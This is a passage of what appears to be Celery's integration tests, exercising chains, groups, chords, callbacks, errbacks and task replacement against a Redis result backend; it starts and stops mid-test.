subtests.test(msg="Chain child task errbacks are called"): # Only the first child task gets a change to run and fail await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_with_callback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) chain_sig = chain(add_replaced.si(42, 1337), identity.s()) chain_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 42 + 1337 with subtests.test(msg="Callback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_with_errback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) chain_sig = chain(add_replaced.si(42, 1337), fail.s()) chain_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_child_with_callback_replaced(self, manager, 
subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_sig = add_replaced.si(42, 1337) child_sig.link(callback) chain_sig = chain(child_sig, identity.s()) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 42 + 1337 with subtests.test(msg="Callback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_child_with_errback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_sig = fail_replaced.si() child_sig.link_error(errback) chain_sig = chain(child_sig, identity.si(42)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_task_replaced_with_chain(self): orig_sig = replace_with_chain.si(42) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_first(self): orig_sig = chain(replace_with_chain.si(42), identity.s()) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_middle(self): orig_sig = chain( identity.s(42), replace_with_chain.s(), identity.s() ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_last(self): orig_sig = chain(identity.s(42), replace_with_chain.s()) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 class test_result_set: @flaky def test_result_set(self, manager): assert_ping(manager) rs = ResultSet([add.delay(1, 1), add.delay(2, 2)]) assert rs.get(timeout=TIMEOUT) == [2, 4] @flaky def test_result_set_error(self, manager): assert_ping(manager) rs = ResultSet([raise_error.delay(), add.delay(1, 1)]) rs.get(timeout=TIMEOUT, propagate=False) assert rs.results[0].failed() assert rs.results[1].successful() class test_group: @flaky def test_ready_with_exception(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') g = group([add.s(1, 2), raise_error.s()]) result = g.apply_async() while not result.ready(): pass @flaky def test_empty_group_result(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') task = group([]) result = task.apply_async() GroupResult.save(result) task = GroupResult.restore(result.id) assert task.results == [] @flaky def test_parent_ids(self, manager): assert_ping(manager) g = ( ids.si(i=1) | ids.si(i=2) | group(ids.si(i=i) for i in range(2, 50)) ) res = g() expected_root_id = res.parent.parent.id expected_parent_id = res.parent.id values = res.get(timeout=TIMEOUT) for i, r in enumerate(values): root_id, parent_id, value = r assert root_id == expected_root_id assert parent_id == expected_parent_id assert value == i + 2 @flaky def test_nested_group(self, manager): assert_ping(manager) 
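        # Nested groups are unrolled by the canvas machinery, so the
        # assertion below expects a flat list of results, not nested lists.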
c = group( add.si(1, 10), group( add.si(1, 100), group( add.si(1, 1000), add.si(1, 2000), ), ), ) res = c() assert res.get(timeout=TIMEOUT) == [11, 101, 1001, 2001] @flaky def test_large_group(self, manager): assert_ping(manager) c = group(identity.s(i) for i in range(1000)) res = c.delay() assert res.get(timeout=TIMEOUT) == list(range(1000)) def test_group_lone(self, manager): """ Test that a simple group completes. """ sig = group(identity.s(42), identity.s(42)) # [42, 42] res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_group_group(self, manager): """ Confirm that groups nested inside groups get unrolled. """ sig = group( group(identity.s(42), identity.s(42)), # [42, 42] ) # [42, 42] due to unrolling res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_group_chord_counting_simple(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_sig = identity.si(42) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[42]] def test_nested_group_chord_counting_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = chain((identity.si(1337), ) * gchild_count) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[1337]] def test_nested_group_chord_counting_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = group((identity.si(1337), ) * gchild_count) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[1337] * gchild_count] def test_nested_group_chord_counting_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = chord( (identity.si(1337), ) * gchild_count, identity.si(31337), ) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[31337]] def test_nested_group_chord_counting_mixed(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 child_chord = chord( ( identity.si(42), chain((identity.si(42), ) * gchild_count), group((identity.si(42), ) * gchild_count), chord((identity.si(42), ) * gchild_count, identity.si(1337)), ), identity.s(), ) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected. 
The # group result gets unrolled into the encapsulating chord, hence the # weird unpacking below assert res.get(timeout=TIMEOUT) == [ [42, 42, *((42, ) * gchild_count), 1337] ] @pytest.mark.xfail(raises=TimeoutError, reason="#6734") def test_nested_group_chord_body_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_chord = chord(identity.si(42), chain((identity.s(), ))) group_sig = group((child_chord, )) res = group_sig.delay() # The result can be expected to timeout since it seems like its # underlying promise might not be getting fulfilled (ref #6734). Pick a # short timeout since we don't want to block for ages and this is a # fairly simple signature which should run pretty quickly. expected_result = [[42]] with pytest.raises(TimeoutError) as expected_excinfo: res.get(timeout=TIMEOUT / 10) # Get the child `AsyncResult` manually so that we don't have to wait # again for the `GroupResult` assert res.children[0].get(timeout=TIMEOUT) == expected_result[0] assert res.get(timeout=TIMEOUT) == expected_result # Re-raise the expected exception so this test will XFAIL raise expected_excinfo.value def test_callback_called_by_group(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() callback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) callback = redis_echo.si(callback_msg, redis_key=redis_key) group_sig = group(identity.si(42), identity.si(1337)) group_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Group result is returned"): res = group_sig.delay() assert res.get(timeout=TIMEOUT) == [42, 1337] with subtests.test(msg="Callback is called after group is completed"): await_redis_echo({callback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_first(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) group_sig = group(fail.s(), identity.si(42)) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_last(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) group_sig = group(identity.si(42), fail.s()) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_multiple(self, manager, subtests): if not 
manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() expected_errback_count = 42 redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) # Include a mix of passing and failing tasks group_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *(fail.s() for _ in range(expected_errback_count)), ) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_count(expected_errback_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_children_with_callbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = identity.si(1337) child_sig.link(callback) group_sig = group(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [1337] * child_task_count with subtests.test(msg="Chain child task callbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_children_with_errbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = fail.si() child_sig.link_error(errback) group_sig = group(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain fails due to a child task dying"): res_obj = group_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Chain child task errbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_with_callback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) group_sig = group(add_replaced.si(42, 1337), identity.si(31337)) group_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337] with subtests.test(msg="Callback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_with_errback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) group_sig = group(add_replaced.si(42, 1337), fail.s()) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() with 
pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_with_callback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_sig = add_replaced.si(42, 1337) child_sig.link(callback) group_sig = group(child_sig, identity.si(31337)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337] with subtests.test(msg="Callback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_with_errback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_sig = fail_replaced.si() child_sig.link_error(errback) group_sig = group(child_sig, identity.si(42)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_replaced_with_chain_first(self): orig_sig = group(replace_with_chain.si(42), identity.s(1337)) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_group_child_replaced_with_chain_middle(self): orig_sig = group( identity.s(42), replace_with_chain.s(1337), identity.s(31337) ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337] def test_group_child_replaced_with_chain_last(self): orig_sig = group(identity.s(42), replace_with_chain.s(1337)) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def assert_ids(r, expected_value, expected_root_id, expected_parent_id): root_id, parent_id, value = r.get(timeout=TIMEOUT) assert expected_value == value assert root_id == expected_root_id assert parent_id == expected_parent_id def assert_ping(manager): ping_result = manager.inspect().ping() assert ping_result ping_val = list(ping_result.values())[0] assert ping_val == {"ok": "pong"} class test_chord: @flaky def test_simple_chord_with_a_delay_in_group_save(self, manager, monkeypatch): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) if not isinstance(manager.app.backend, BaseKeyValueStoreBackend): raise pytest.skip("The delay may only occur in the cache backend") x = BaseKeyValueStoreBackend._apply_chord_incr def apply_chord_incr_with_sleep(self, *args, **kwargs): sleep(1) x(self, *args, **kwargs) monkeypatch.setattr(BaseKeyValueStoreBackend, '_apply_chord_incr', apply_chord_incr_with_sleep) c = chord(header=[add.si(1, 1), add.si(1, 1)], body=tsum.s()) result = c() assert result.get(timeout=TIMEOUT) == 4 @flaky def test_redis_subscribed_channels_leak(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') 
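        # Re-initialising the result consumer below resets its pub/sub
        # subscriptions, so the channel counts asserted in this test start
        # from a clean baseline.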
manager.app.backend.result_consumer.on_after_fork() initial_channels = get_active_redis_channels() initial_channels_count = len(initial_channels) total_chords = 10 async_results = [ chord([add.s(5, 6), add.s(6, 7)])(delayed_sum.s()) for _ in range(total_chords) ] channels_before = get_active_redis_channels() manager.assert_result_tasks_in_progress_or_completed(async_results) channels_before_count = len(channels_before) assert set(channels_before) != set(initial_channels) assert channels_before_count > initial_channels_count # The total number of active Redis channels at this point # is the number of chord header tasks multiplied by the # total chord tasks, plus the initial channels # (existing from previous tests). chord_header_task_count = 2 assert channels_before_count <= \ chord_header_task_count * total_chords + initial_channels_count result_values = [ result.get(timeout=TIMEOUT) for result in async_results ] assert result_values == [24] * total_chords channels_after = get_active_redis_channels() channels_after_count = len(channels_after) assert channels_after_count == initial_channels_count assert set(channels_after) == set(initial_channels) @flaky def test_replaced_nested_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([ chord( [add.s(1, 2), add_replaced.s(3, 4)], add_to_all.s(5), ) | tsum.s(), chord( [add_replaced.s(6, 7), add.s(0, 0)], add_to_all.s(8), ) | tsum.s(), ], add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [29, 38] @flaky def test_add_to_chord(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = group([add_to_all_to_chord.s([1, 2, 3], 4)]) | identity.s() res = c() assert sorted(res.get()) == [0, 5, 6, 7] @flaky def test_add_chord_to_chord(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = group([add_chord_to_chord.s([1, 2, 3], 4)]) | identity.s() res = c() assert sorted(res.get()) == [0, 5 + 6 + 7] @flaky def test_eager_chord_inside_task(self, manager): from .tasks import chord_add prev = chord_add.app.conf.task_always_eager chord_add.app.conf.task_always_eager = True chord_add.apply_async(args=(4, 8), throw=True).get() chord_add.app.conf.task_always_eager = prev def test_group_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = ( add.s(2, 2) | group(add.s(i) for i in range(4)) | add_to_all.s(8) ) res = c() assert res.get(timeout=TIMEOUT) == [12, 13, 14, 15] def test_nested_group_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chain( add.si(1, 0), group( add.si(1, 100), chain( add.si(1, 200), group( add.si(1, 1000), add.si(1, 2000), ), ), ), add.si(1, 10), ) res = c() assert res.get(timeout=TIMEOUT) == 11 @flaky def test_single_task_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([add.s(2, 5)], body=add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [16] c2 = group([add.s(2, 5)]) | add_to_all.s(9) res2 = c2() assert res2.get(timeout=TIMEOUT) == [16] def test_empty_header_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([], 
body=add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [] c2 = group([]) | add_to_all.s(9) res2 = c2() assert res2.get(timeout=TIMEOUT) == [] @flaky def test_nested_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([ chord([add.s(1, 2), add.s(3, 4)], add.s([5])), chord([add.s(6, 7)], add.s([10])) ], add_to_all.s(['A'])) res1 = c1() assert res1.get(timeout=TIMEOUT) == [[3, 7, 5, 'A'], [13, 10, 'A']] c2 = group([ group([add.s(1, 2), add.s(3, 4)]) | add.s([5]), group([add.s(6, 7)]) | add.s([10]), ]) | add_to_all.s(['A']) res2 = c2() assert res2.get(timeout=TIMEOUT) == [[3, 7, 5, 'A'], [13, 10, 'A']] c = group([ group([ group([ group([ add.s(1, 2) ]) | add.s([3]) ]) | add.s([4]) ]) | add.s([5]) ]) | add.s([6]) res = c() assert [[[[3, 3], 4], 5], 6] == res.get(timeout=TIMEOUT) @flaky def test_parent_ids(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') root = ids.si(i=1) expected_root_id = root.freeze().id g = chain( root, ids.si(i=2), chord( group(ids.si(i=i) for i in range(3, 50)), chain(collect_ids.s(i=50) | ids.si(i=51)), ), ) self.assert_parentids_chord(g(), expected_root_id) @flaky def test_parent_ids__OR(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') root = ids.si(i=1) expected_root_id = root.freeze().id g = ( root | ids.si(i=2) | group(ids.si(i=i) for i in range(3, 50)) | collect_ids.s(i=50) | ids.si(i=51) ) self.assert_parentids_chord(g(), expected_root_id) def assert_parentids_chord(self, res, expected_root_id): assert isinstance(res, AsyncResult) assert isinstance(res.parent, AsyncResult) assert isinstance(res.parent.parent, GroupResult) assert isinstance(res.parent.parent.parent, AsyncResult) assert isinstance(res.parent.parent.parent.parent, AsyncResult) # first we check the last task assert_ids(res, 51, expected_root_id, res.parent.id) # then the chord callback prev, (root_id, parent_id, value) = res.parent.get(timeout=30) assert value == 50 assert root_id == expected_root_id # started by one of the chord header tasks. assert parent_id in res.parent.parent.results # check what the chord callback recorded for i, p in enumerate(prev): root_id, parent_id, value = p assert root_id == expected_root_id assert parent_id == res.parent.parent.parent.id # ids(i=2) root_id, parent_id, value = res.parent.parent.parent.get(timeout=30) assert value == 2 assert parent_id == res.parent.parent.parent.parent.id assert root_id == expected_root_id # ids(i=1) root_id, parent_id, value = res.parent.parent.parent.parent.get( timeout=30) assert value == 1 assert root_id == expected_root_id assert parent_id is None def test_chord_on_error(self, manager): from celery import states from .tasks import ExpectedException if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') # Run the chord and wait for the error callback to finish. Note that # this only works for old style callbacks since they get dispatched to # run async while new style errbacks are called synchronously so that # they can be passed the request object for the failing task. 
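        # For reference, the two errback flavours defined in
        # ``t/integration/tasks.py`` are:
        #     errback_old_style(request_id)        # old style: failed task id only
        #     errback_new_style(request, exc, tb)  # new style: full request object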
c1 = chord( header=[add.s(1, 2), add.s(3, 4), fail.s()], body=print_unicode.s('This should not be called').on_error( errback_old_style.s()), ) res = c1() with pytest.raises(ExpectedException): res.get(propagate=True) # Got to wait for children to populate. check = ( lambda: res.children, lambda: res.children[0].children, lambda: res.children[0].children[0].result, ) start = monotonic() while not all(f() for f in check): if monotonic() > start + TIMEOUT: raise TimeoutError("Timed out waiting for children") sleep(0.1) # Extract the results of the successful tasks from the chord. # # We could do this inside the error handler, and probably would in a # real system, but for the purposes of the test it's obnoxious to get # data out of the error handler. # # So for clarity of our test, we instead do it here. # Use the error callback's result to find the failed task. uuid_patt = re.compile( r"[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}" ) callback_chord_exc = AsyncResult( res.children[0].children[0].result ).result failed_task_id = uuid_patt.search(str(callback_chord_exc)) assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc failed_task_id = failed_task_id.group() # Use new group_id result metadata to get group ID. failed_task_result = AsyncResult(failed_task_id) original_group_id = failed_task_result._get_task_meta()['group_id'] # Use group ID to get preserved group result. backend = fail.app.backend j_key = backend.get_key_for_group(original_group_id, '.j') redis_connection = get_redis_connection() # The redis key is either a list or zset depending on configuration if manager.app.conf.result_backend_transport_options.get( 'result_chord_ordered', True ): job_results = redis_connection.zrange(j_key, 0, 3) else: job_results = redis_connection.lrange(j_key, 0, 3) chord_results = [backend.decode(t) for t in job_results] # Validate group result assert [cr[3] for cr in chord_results if cr[2] == states.SUCCESS] == \ [3, 7] assert len([cr for cr in chord_results if cr[2] != states.SUCCESS] ) == 1 @flaky def test_generator(self, manager): def assert_generator(file_name): for i in range(3): sleep(1) if i == 2: with open(file_name) as file_handle: # ensures chord header generators tasks are processed incrementally #3021 assert file_handle.readline() == '0\n', "Chord header was unrolled too early" yield write_to_file_and_return_int.s(file_name, i) with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_file: file_name = tmp_file.name c = chord(assert_generator(file_name), tsum.s()) assert c().get(timeout=TIMEOUT) == 3 @flaky def test_parallel_chords(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord(group(add.s(1, 2), add.s(3, 4)), tsum.s()) c2 = chord(group(add.s(1, 2), add.s(3, 4)), tsum.s()) g = group(c1, c2) r = g.delay() assert r.get(timeout=TIMEOUT) == [10, 10] @flaky def test_chord_in_chords_with_chains(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chord( group([ chain( add.si(1, 2), chord( group([add.si(1, 2), add.si(1, 2)]), add.si(1, 2), ), ), chain( add.si(1, 2), chord( group([add.si(1, 2), add.si(1, 2)]), add.si(1, 2), ), ), ]), add.si(2, 2) ) r = c.delay() assert r.get(timeout=TIMEOUT) == 4 @flaky def test_chain_chord_chain_chord(self, manager): # test for #2573 try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chain( 
identity.si(1), chord( [ identity.si(2), chain( identity.si(3), chord( [identity.si(4), identity.si(5)], identity.si(6) ) ) ], identity.si(7) ) ) res = c.delay() assert res.get(timeout=TIMEOUT) == 7 @pytest.mark.xfail(reason="Issue #6176") def test_chord_in_chain_with_args(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chain( chord( [identity.s(), identity.s()], identity.s(), ), identity.s(), ) res1 = c1.apply_async(args=(1,)) assert res1.get(timeout=TIMEOUT) == [1, 1] res1 = c1.apply(args=(1,)) assert res1.get(timeout=TIMEOUT) == [1, 1] @pytest.mark.xfail(reason="Issue #6200") def test_chain_in_chain_with_args(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chain( # NOTE: This chain should have only 1 chain inside it chain( identity.s(), identity.s(), ), ) res1 = c1.apply_async(args=(1,)) assert res1.get(timeout=TIMEOUT) == 1 res1 = c1.apply(args=(1,)) assert res1.get(timeout=TIMEOUT) == 1 @flaky def test_large_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(identity.si(i) for i in range(1000)) | tsum.s() res = c.delay() assert res.get(timeout=TIMEOUT) == 499500 @flaky def test_chain_to_a_chord_with_large_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = identity.si(1) | group( identity.s() for _ in range(1000)) | tsum.s() res = c.delay() assert res.get(timeout=TIMEOUT) == 1000 @flaky def test_priority(self, manager): c = chain(return_priority.signature(priority=3))() assert c.get(timeout=TIMEOUT) == "Priority: 3" @flaky def test_priority_chain(self, manager): c = return_priority.signature(priority=3) | return_priority.signature( priority=5) assert c().get(timeout=TIMEOUT) == "Priority: 5" def test_nested_chord_group(self, manager): """ Confirm that groups nested inside chords get unrolled. """ try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chord( ( group(identity.s(42), identity.s(42)), # [42, 42] ), identity.s() # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chord_group_chain_group_tail(self, manager): """ Sanity check that a deeply nested group is completed as expected. Groups at the end of chains nested in chords have had issues and this simple test sanity check that such a task structure can be completed. 
""" try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chord( group( chain( identity.s(42), # 42 group( identity.s(), # 42 identity.s(), # 42 ), # [42, 42] ), # [42, 42] ), # [[42, 42]] since the chain prevents unrolling identity.s(), # [[42, 42]] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [[42, 42]] @pytest.mark.xfail(TEST_BACKEND.startswith('redis://'), reason="Issue #6437") def test_error_propagates_from_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = add.s(1, 1) | fail.s() | group(add.s(1), add.s(1)) res = sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_error_propagates_from_chord2(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = add.s(1, 1) | add.s(1) | group(add.s(1), fail.s()) res = sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_error_propagates_to_chord_from_simple(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_simple( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with 